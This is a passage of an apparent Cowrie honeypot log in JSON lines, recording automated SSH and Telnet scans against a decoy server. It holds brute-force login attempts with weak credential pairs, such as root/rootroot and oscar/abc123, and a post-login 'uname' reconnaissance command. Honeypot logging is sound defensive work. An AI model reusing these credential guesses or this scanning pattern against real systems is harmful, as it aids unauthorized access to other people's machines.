"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:23:54.761235Z","src_ip":"212.227.125.160","session":"cf6a2f59d537"}
{"eventid":"cowrie.session.closed","duration":12.864866971969604,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:55.281571Z","src_ip":"212.227.125.160","session":"25cbaf530752"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:23:55.420734Z","src_ip":"212.227.125.160","session":"cf6a2f59d537"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33959,"dst_ip":"1.2.3.4","dst_port":23,"session":"e5586e3b41a4","protocol":"telnet","message":"New connection: 212.227.125.160:33959 (1.2.3.4:23) [session: e5586e3b41a4]","sensor":"my-vps","timestamp":"2025-08-28T07:23:55.457508Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:23:55.929607Z","src_ip":"212.227.125.160","session":"cf6a2f59d537"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:23:55.930283Z","src_ip":"212.227.125.160","session":"cf6a2f59d537"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:56.162163Z","src_ip":"212.227.125.160","session":"cf6a2f59d537"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:23:56.163251Z","src_ip":"212.227.125.160","session":"cf6a2f59d537"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44596,"dst_ip":"1.2.3.4","dst_port":22,"session":"b13a2354c769","protocol":"ssh","message":"New connection: 212.227.235.229:44596 (1.2.3.4:22) [session: b13a2354c769]","sensor":"my-vps","timestamp":"2025-08-28T07:24:00.905081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:24:00.905890Z","src_ip":"212.227.235.229","session":"b13a2354c769"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:24:01.149082Z","src_ip":"212.227.235.229","session":"b13a2354c769"}
{"eventid":"cowrie.login.success","username":"root","password":"rootroot","message":"login attempt [root/rootroot] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:24:02.126788Z","src_ip":"212.227.235.229","session":"b13a2354c769"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:24:02.635063Z","src_ip":"212.227.235.229","session":"b13a2354c769"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T07:24:02.635798Z","src_ip":"212.227.235.229","session":"b13a2354c769"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:02.881303Z","src_ip":"212.227.235.229","session":"b13a2354c769"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:02.882514Z","src_ip":"212.227.235.229","session":"b13a2354c769"}
{"eventid":"cowrie.session.closed","duration":13.07218313217163,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:08.529602Z","src_ip":"212.227.125.160","session":"e5586e3b41a4"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":53232,"dst_ip":"1.2.3.4","dst_port":23,"session":"c5ba3c4166a5","protocol":"telnet","message":"New connection: 8.222.212.69:53232 (1.2.3.4:23) [session: c5ba3c4166a5]","sensor":"my-vps","timestamp":"2025-08-28T07:24:08.672298Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34170,"dst_ip":"1.2.3.4","dst_port":23,"session":"4df802fa25e0","protocol":"telnet","message":"New connection: 212.227.125.160:34170 (1.2.3.4:23) [session: 4df802fa25e0]","sensor":"my-vps","timestamp":"2025-08-28T07:24:08.802697Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35098,"dst_ip":"1.2.3.4","dst_port":22,"session":"72e04f9133b6","protocol":"ssh","message":"New connection: 212.227.125.160:35098 (1.2.3.4:22) [session: 72e04f9133b6]","sensor":"my-vps","timestamp":"2025-08-28T07:24:10.601220Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:24:10.602041Z","src_ip":"212.227.125.160","session":"72e04f9133b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:24:10.817865Z","src_ip":"212.227.125.160","session":"72e04f9133b6"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123","message":"login attempt [es/es123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:24:11.466125Z","src_ip":"212.227.125.160","session":"72e04f9133b6"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:12.683527Z","src_ip":"212.227.125.160","session":"72e04f9133b6"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":51310,"dst_ip":"1.2.3.4","dst_port":23,"session":"7339692e5a98","protocol":"telnet","message":"New connection: 8.222.212.69:51310 (1.2.3.4:23) [session: 7339692e5a98]","sensor":"my-vps","timestamp":"2025-08-28T07:24:14.124254Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38592,"dst_ip":"1.2.3.4","dst_port":22,"session":"cbbfc004e1b6","protocol":"ssh","message":"New connection: 212.227.235.229:38592 (1.2.3.4:22) [session: cbbfc004e1b6]","sensor":"my-vps","timestamp":"2025-08-28T07:24:16.960352Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:24:16.961351Z","src_ip":"212.227.235.229","session":"cbbfc004e1b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:24:17.208862Z","src_ip":"212.227.235.229","session":"cbbfc004e1b6"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123","message":"login attempt [es/es123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:24:17.955511Z","src_ip":"212.227.235.229","session":"cbbfc004e1b6"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:19.205552Z","src_ip":"212.227.235.229","session":"cbbfc004e1b6"}
{"eventid":"cowrie.session.closed","duration":14.038522481918335,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:22.841119Z","src_ip":"212.227.125.160","session":"4df802fa25e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34387,"dst_ip":"1.2.3.4","dst_port":23,"session":"b6ccf5c3e29c","protocol":"telnet","message":"New connection: 212.227.125.160:34387 (1.2.3.4:23) [session: b6ccf5c3e29c]","sensor":"my-vps","timestamp":"2025-08-28T07:24:23.045084Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48064,"dst_ip":"1.2.3.4","dst_port":22,"session":"26b966760b41","protocol":"ssh","message":"New connection: 212.227.125.160:48064 (1.2.3.4:22) [session: 26b966760b41]","sensor":"my-vps","timestamp":"2025-08-28T07:24:26.620218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:24:26.621272Z","src_ip":"212.227.125.160","session":"26b966760b41"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:24:26.871214Z","src_ip":"212.227.125.160","session":"26b966760b41"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-28T07:24:27.549907Z","src_ip":"212.227.125.160","session":"26b966760b41"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:28.771969Z","src_ip":"212.227.125.160","session":"26b966760b41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":28368,"dst_ip":"1.2.3.4","dst_port":22,"session":"b94946ac5002","protocol":"ssh","message":"New connection: 212.227.235.229:28368 (1.2.3.4:22) [session: b94946ac5002]","sensor":"my-vps","timestamp":"2025-08-28T07:24:32.703217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T07:24:32.703968Z","src_ip":"212.227.235.229","session":"b94946ac5002"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T07:24:32.829088Z","src_ip":"212.227.235.229","session":"b94946ac5002"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35804,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcbc57667023","protocol":"ssh","message":"New connection: 212.227.235.229:35804 (1.2.3.4:22) [session: fcbc57667023]","sensor":"my-vps","timestamp":"2025-08-28T07:24:33.239770Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:24:33.240605Z","src_ip":"212.227.235.229","session":"fcbc57667023"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"oscar","message":"login attempt [oscar/oscar] failed","sensor":"my-vps","timestamp":"2025-08-28T07:24:33.435098Z","src_ip":"212.227.235.229","session":"b94946ac5002"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:24:33.488825Z","src_ip":"212.227.235.229","session":"fcbc57667023"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-28T07:24:34.235157Z","src_ip":"212.227.235.229","session":"fcbc57667023"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abc123","message":"login attempt [oscar/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:24:34.561790Z","src_ip":"212.227.235.229","session":"b94946ac5002"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:35.485570Z","src_ip":"212.227.235.229","session":"fcbc57667023"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abcd123","message":"login attempt [oscar/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T07:24:35.688735Z","src_ip":"212.227.235.229","session":"b94946ac5002"}
{"eventid":"cowrie.session.closed","duration":13.728550672531128,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:36.773573Z","src_ip":"212.227.125.160","session":"b6ccf5c3e29c"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abcd1234","message":"login attempt [oscar/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T07:24:36.818219Z","src_ip":"212.227.235.229","session":"b94946ac5002"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34671,"dst_ip":"1.2.3.4","dst_port":23,"session":"b15dd002e4f4","protocol":"telnet","message":"New connection: 212.227.125.160:34671 (1.2.3.4:23) [session: b15dd002e4f4]","sensor":"my-vps","timestamp":"2025-08-28T07:24:37.027507Z"}
{"eventid":"cowrie.login.failed","username":"oscar","password":"abc1234","message":"login attempt [oscar/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T07:24:37.945328Z","src_ip":"212.227.235.229","session":"b94946ac5002"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:39.073427Z","src_ip":"212.227.235.229","session":"b94946ac5002"}
{"eventid":"cowrie.session.closed","duration":32.30798387527466,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:40.980215Z","src_ip":"8.222.212.69","session":"c5ba3c4166a5"}
{"eventid":"cowrie.session.closed","duration":31.84722924232483,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:45.971421Z","src_ip":"8.222.212.69","session":"7339692e5a98"}
{"eventid":"cowrie.session.closed","duration":13.585649251937866,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:24:50.613087Z","src_ip":"212.227.125.160","session":"b15dd002e4f4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34921,"dst_ip":"1.2.3.4","dst_port":23,"session":"5a963a5e309b","protocol":"telnet","message":"New connection: 212.227.125.160:34921 (1.2.3.4:23) [session: 5a963a5e309b]","sensor":"my-vps","timestamp":"2025-08-28T07:24:50.816539Z"}
{"eventid":"cowrie.session.closed","duration":13.54460620880127,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:25:04.361078Z","src_ip":"212.227.125.160","session":"5a963a5e309b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35132,"dst_ip":"1.2.3.4","dst_port":23,"session":"aba6b13393f5","protocol":"telnet","message":"New connection: 212.227.125.160:35132 (1.2.3.4:23) [session: aba6b13393f5]","sensor":"my-vps","timestamp":"2025-08-28T07:25:04.525071Z"}
{"eventid":"cowrie.session.closed","duration":12.27580213546753,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:25:16.800774Z","src_ip":"212.227.125.160","session":"aba6b13393f5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50492,"dst_ip":"1.2.3.4","dst_port":22,"session":"5a5b7688bf64","protocol":"ssh","message":"New connection: 217.72.205.35:50492 (1.2.3.4:22) [session: 5a5b7688bf64]","sensor":"my-vps","timestamp":"2025-08-28T07:29:31.783548Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T07:29:31.784684Z","src_ip":"217.72.205.35","session":"5a5b7688bf64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32889,"dst_ip":"1.2.3.4","dst_port":23,"session":"c627cea6ba89","protocol":"telnet","message":"New connection: 212.227.125.160:32889 (1.2.3.4:23) [session: c627cea6ba89]","sensor":"my-vps","timestamp":"2025-08-28T07:30:55.296561Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43660,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf8bf3e7d5e8","protocol":"ssh","message":"New connection: 212.227.235.229:43660 (1.2.3.4:22) [session: cf8bf3e7d5e8]","sensor":"my-vps","timestamp":"2025-08-28T07:31:37.131569Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:31:37.134566Z","src_ip":"212.227.235.229","session":"cf8bf3e7d5e8"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],